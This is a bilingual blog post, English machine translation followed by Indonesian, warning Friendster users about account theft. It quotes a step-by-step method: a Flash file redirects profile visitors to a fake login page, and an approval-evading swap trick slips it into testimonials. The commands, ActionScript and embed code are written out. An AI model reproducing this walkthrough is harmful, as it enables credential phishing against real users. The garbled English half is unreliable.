Do you have an account and often visit Friendster? If yes so be careful from now. Friendster is a social networking site services which has a very large number of members in the world.However, if you yearn for this site has the grip of security that can be used by hackers to steal your account? The following article will explain how a hacker using engineering techniques to steal username and password Friendster, which I quoted from the blog chaidir.wordpress.com.
Techniques used to redirect a profile of Friendster is using a flash. Now I want to give me an example of how we redirect Friendster profile URL to someone who we want. First we create a simple script, such as flash code below. To use Linux, install the Ming package first. Ming is a library that can generate the Macromedia Flash file (. Swf). If you use Ubuntu and not to install, run the following command:
apt-get install libming-util
If Ming successfully installed, create a file with your editor, which contains the following code and save with the name flash.as:
etURL ( "http://www.example.com");
for instance as follows:
getURL ( "http://chaidir.wordpress.com");
After a flash file (. Swf) by running the following command:
chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as
If successful, it will produce a file called Flash out.swf. This file when accessed from the browser will redirect me to a URL that we defined previously. For example, please access the flash that I have made here. When you access the url, then you direct 'directed' towards http://chaidir.wordpress.com.
Then, upload the files was a flash (out.swf) to a place that is easily accessible. For example, in http://numpang.com/out.swf. After that, send a testimonial to the people who want to give testimonials in the flash file with this.
And then enter the following code:
<object classid=�clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' codebase=�http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0' width=�400' height=�250'><param name=�movie� value=�http://numpang.com/out.swf� /><param name=�quality� value=�high� /><embed src=�http://numpang.com/out.swf� quality=�high� pluginspage=�http://www.macromedia.com/go/getflashplayer� type=�application/x-shockwave-flash� width=�400' height=�250' allowScriptAccess=�never�></embed></object>
To try if this successfully testimonials, click preview. So that the recipient can receive testimonials, delete the file and replace the flash (http://numpang.com/out.swf) with a flash animation that attract attention. For example, with a flash of Babaflash Forum. After the new Constitution, replace and switch again (upload again) with a flash file.
Now, in the example of Friendster in false cases, the cracker redirect every user who wants to see the profile that was already get flash and direct to http://www.friendster.co.nr. Pick to win there and created a page that resembles the login page and Friendster seems to happen every error that requires the user to enter email and password.
Facilities to submit a testimonial on Friendster cracker is used to deceptive people who often play with Friendster. Therefore, be careful of testimonials that use flash. If testimonail get from people who are not known or even a flash that important, better not to open it.
Photo credit: thor.info
Bahasa
Apakah kamu punya account dan sering mengunjungi Friendster? Jika ya maka berhati-hatilah mulai dari sekarang. Friendster merupakan situs layanan jejaring sosial (social networking) yang mempunyai jumlah anggota sangat besar termasuk di Indonesia. Indonesia menempati posisi ke-3 setelah Filipina dan Malaysia. Dengan member yang sangat besar ini pihak Friendster pun meluncurkan situsnya dalam Bahasa Indonesia. Hal ini sungguh menggembirakan bagi para pengguna Friendster di Indonesia.
Namun tahukah kamu jika situs ini mempunyai celah keamanan yang dapat digunakan oleh para hacker untuk mencuri account kamu? Berikut artikel bagaimana seorang hacker menggunakan teknik rekayasa untuk mencuri username dan password pengguna Friendster yang saya kutip dari blog chaidir.wordpress.com.
Teknik yang digunakan untuk me-redirect suatu profile dari Friendster adalah dengan menggunakan flash. Sekarang saya ingin memberikan contoh bagaimana kita me-redirect profile Friendster seseorang menuju URL yang kita inginkan. Pertama kita buat script flash sederhana seperti kode dibawah ini. Untuk yang menggunakan linux, install Ming package terlebih dahulu. Ming adalah library yang dapat menghasilkan file Macromedia Flash (.swf). Jika anda menggunakan ubuntu dan belum menginstall, jalankan perintah berikut :
apt-get install libming-util
Jika Ming berhasil diinstal, buat sebuah file dengan editor anda yang berisi kode berikut dan simpan dengan nama flash.as :
getURL("http://www.contoh.com");
misalkan seperti berikut :
getURL("http://chaidir.wordpress.com");
Setelah itu buat file flash (.swf) dengan menjalankan perintah berikut :
chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as
Jika berhasil, maka akan dihasilkan file Flash bernama out.swf. File ini ketika diakses dari browser, akan me-redirect ke URL yang kita definisikan sebelumnya. Contohnya silahkan akses flash yang telah saya buat disini. Apabila anda mengakses url tersebut, maka anda langsung �diarahkan� menuju http://chaidir.wordpress.com.
Selanjutnya upload file flash tadi (out.swf) ke tempat yang mudah diakses. Misalkan di http://numpang.com/out.swf. Setelah itu, kirim testimonial ke orang yang ingin di berikan testimonial dengan memasukkan file flash ini.
Caranya masukkan kode berikut :
<object classid=�clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' codebase=�http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0' width=�400' height=�250'><param name=�movie� value=�http://numpang.com/out.swf� /><param name=�quality� value=�high� /><embed src=�http://numpang.com/out.swf� quality=�high� pluginspage=�http://www.macromedia.com/go/getflashplayer� type=�application/x-shockwave-flash� width=�400' height=�250' allowScriptAccess=�never�></embed></object>
Untuk mencoba apakah testimonial ini berhasil, klik priview. Agar sang penerima testimonial bisa meng-approve testimonial, hapus ganti file flash tadi terlebih dahulu (http://numpang.com/out.swf) dengan flash animasi yang menarik perhatian. Misalnya dengan flash dari Babaflash Forum. Baru setelah di approve, aktifkan ganti lagi (upload lagi) dengan file flash tadi.
Nah, dalam contoh kasus di Friendster palsu, sang cracker me-redirect setiap user yang ingin melihat profile yang sudah disusupi flash tadi dan mengarahkannya ke http://www.friendster.co.nr. Dan celakanya disitu dibuat halaman yang menyerupai halaman login Friendster dan seolah-olah terjadi kesalahan yang mengharuskan setiap user memasukkan email dan passwordnya.
Fasilitas untuk mengirimkan testimonial di Friendster inilah yang dimanfaatkan cracker untuk �mengelabuhi� orang-orang yang sering bermain-main dengan Friendster. Oleh karena itu, berhati-hatilah terhadap testimonial yang menggunakan flash. Jika mendapatkan testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash yang ngga penting, lebih baik tidak usah di approve aja.
Kredit foto: thor.infoBaca juga:
- Mencegah Friendster Hacking
- Hati-hati Menggunakan Komputer Kerja di Kantor
- Membuka Situs yang Diblokir
No comments:
Post a Comment